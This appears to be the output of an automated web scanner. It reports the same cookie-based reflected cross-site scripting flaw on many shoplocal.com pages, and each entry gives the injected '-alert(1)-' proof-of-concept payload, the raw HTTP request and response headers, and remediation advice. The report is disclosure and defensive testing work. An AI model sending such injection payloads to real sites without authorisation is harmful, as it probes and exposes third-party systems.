<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b19'-alert(1)-'4e32c7f23f1 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /breakfast-bars-pop-tarts.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=030b19'-alert(1)-'4e32c7f23f1; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:28 GMT Connection: close Content-Length: 152436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc50'-alert(1)-'25893dbac9a was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /breakfast-cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=05dc50'-alert(1)-'25893dbac9a; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:28 GMT Connection: close Content-Length: 169395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b514b'-alert(1)-'caa68da5b09 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browselocall1.aspx?N=133251 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0b514b'-alert(1)-'caa68da5b09; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:27 GMT Connection: close Content-Length: 123225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 771db'-alert(1)-'441e82c2894 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browseonlineall.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0771db'-alert(1)-'441e82c2894; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=N; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:46 GMT Connection: close Content-Length: 132674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46edf'-alert(1)-'fba46f51322 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /buns-rolls.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=046edf'-alert(1)-'fba46f51322; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:34 GMT Connection: close Content-Length: 99170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13f72'-alert(1)-'17870a59e9e was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cakes-pies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=013f72'-alert(1)-'17870a59e9e; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:37 GMT Connection: close Content-Length: 114050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b1c7'-alert(1)-'495482ba169 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=05b1c7'-alert(1)-'495482ba169; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:30 GMT Connection: close Content-Length: 113922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87489'-alert(1)-'f5fbd06c927 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=087489'-alert(1)-'f5fbd06c927; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:56 GMT Connection: close Content-Length: 166002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f67e'-alert(1)-'c8e419cd9ec was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=06f67e'-alert(1)-'c8e419cd9ec; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:46 GMT Connection: close Content-Length: 153093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32641'-alert(1)-'b066d56b80 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cleaning-supplies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=032641'-alert(1)-'b066d56b80; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:48 GMT Connection: close Content-Length: 182392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a02a4'-alert(1)-'9d26bda22a1 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clothing.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0a02a4'-alert(1)-'9d26bda22a1; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:00 GMT Connection: close Content-Length: 124474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbb3b'-alert(1)-'c20380326bb was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-tea.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0bbb3b'-alert(1)-'c20380326bb; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:02 GMT Connection: close Content-Length: 167376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9fb4'-alert(1)-'119b6d8f47a was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cooking-oil.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0a9fb4'-alert(1)-'119b6d8f47a; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:42 GMT Connection: close Content-Length: 92708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25aa'-alert(1)-'003cb108eba was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0c25aa'-alert(1)-'003cb108eba; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0c25aa'-alert(1)-'003cb108eba&couponclippings=; expires=Tue, 20-Nov-2035 18:42:40 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:50 GMT Connection: close Content-Length: 55975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a5c4'-alert(1)-'a03cf7951dd was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dairy.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=02a5c4'-alert(1)-'a03cf7951dd; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:20 GMT Connection: close Content-Length: 172196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2881b'-alert(1)-'2c148c30578 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dessert-mixes-frosting.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=02881b'-alert(1)-'2c148c30578; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:16 GMT Connection: close Content-Length: 156864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ca7'-alert(1)-'4cf89a77a3e was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
